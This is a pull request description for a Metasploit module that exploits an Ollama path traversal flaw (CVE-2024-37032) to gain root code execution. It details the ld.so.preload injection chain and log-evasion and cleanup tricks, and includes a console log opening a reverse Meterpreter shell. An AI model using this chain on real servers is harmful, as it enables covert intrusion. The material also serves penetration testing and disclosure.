Add Ollama path traversal RCE module (CVE-2024-37032)

[Chocapikk]

Hello Metasploit Team,

This PR adds a new exploit module for CVE-2024-37032 ("Probllama"), a path traversal vulnerability in Ollama < 0.1.34 that chains into unauthenticated RCE as root.

Summary

Ollama's model pull mechanism accepts OCI manifests where the digest field is not validated. Instead of enforcing sha256:<64hex>, it accepts arbitrary path traversal sequences (../../../etc/ld.so.preload). This allows a rogue OCI registry to write arbitrary files on the server.

Existing public PoCs (jakabakos, Bi0x) only demonstrate file read/write. This module is the first to chain the arbitrary write into a full RCE with session.

Exploitation flow

The module starts a rogue OCI registry (HttpServer mixin) and performs three steps against the target:

1. Pull 1 (path traversal write) - Serves a malicious manifest with three layers. The first layer is sacrificial (absorbs Ollama's SHA256 digest verification failure and gets deleted). The remaining two layers persist unverified: a shared library containing the payload as a DT_INIT constructor, and /etc/ld.so.preload pointing to it.

2. Pull 2 (trigger model registration) - Serves a valid model with correct SHA256 digests and a minimal GGUF header. Ollama registers this model, making it available for /api/chat. The module then aliases it to a random name and deletes the original to remove the attacker's URL from /api/tags.

3. Trigger (/api/chat) - Ollama spawns the llama.cpp runner process. The dynamic linker reads /etc/ld.so.preload and loads the malicious .so. The constructor unlinks ld.so.preload (prevents re-execution), forks (parent returns so the runner starts normally), and the child executes the payload via mmap + memcpy to an RWX page. The trigger model is deleted in an ensure block regardless of outcome.

Key techniques

• Sacrificial layer trick - Ollama verifies layer digests after download. The first traversal layer fails verification and is deleted, but Ollama stops verifying after the first failure, so remaining layers persist on disk.
• Metasm C constructor - The .so is compiled from C using Metasm::ELF.compile_c with extern libc declarations for fork, unlink, setsid, mmap, memcpy. No raw assembly.
• Faker model names - Model namespaces and aliases are generated with Faker::Hacker to avoid obvious IOC strings in Ollama's logs.
• Zero leftover artifacts - FileDropper cleans up the .so, the constructor unlinks ld.so.preload, and both the trigger model and its alias are deleted via the Ollama API.

Vulnerable versions

• Ollama < 0.1.34 (all platforms, but this module targets Linux x64)
• The default Docker image runs as root with the API bound to 0.0.0.0:11434 (no authentication)

Verification

Ollama 0.1.33 on Docker (Linux x64)

msf6 > use exploit/linux/http/ollama_rce_cve_2024_37032
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > set SRVHOST 172.17.0.1
SRVHOST => 172.17.0.1
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > set SRVPORT 8088
SRVPORT => 8088
msf6 exploit(linux/http/ollama_rce_cve_2024_37032) > run

[*] Started reverse TCP handler on 172.17.0.1:4488
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Ollama 0.1.33 (vulnerable to path traversal)
[*] Using URL: http://172.17.0.1:8088/
[*] Rogue OCI registry on 172.17.0.1:8088
[*] Pull 1: 172.17.0.1:8088/haptic-driver/model (path traversal write)
[+] Payload .so and ld.so.preload written via path traversal
[*] Pull 2: 172.17.0.1:8088/wireless-protocol/model (registering trigger model)
[+] Trigger model registered
[*] Triggering RCE via /api/chat (spawning runner process)...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.17.0.5
[+] Deleted /tmp/CEFMQeff.so
[*] Meterpreter session 1 opened (172.17.0.1:4488 -> 172.17.0.5:48630)

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 6078642134f2
OS           : Debian 12.5 (Linux 6.14.0-123037-tuxedo)
Architecture : x64
Meterpreter  : x64/linux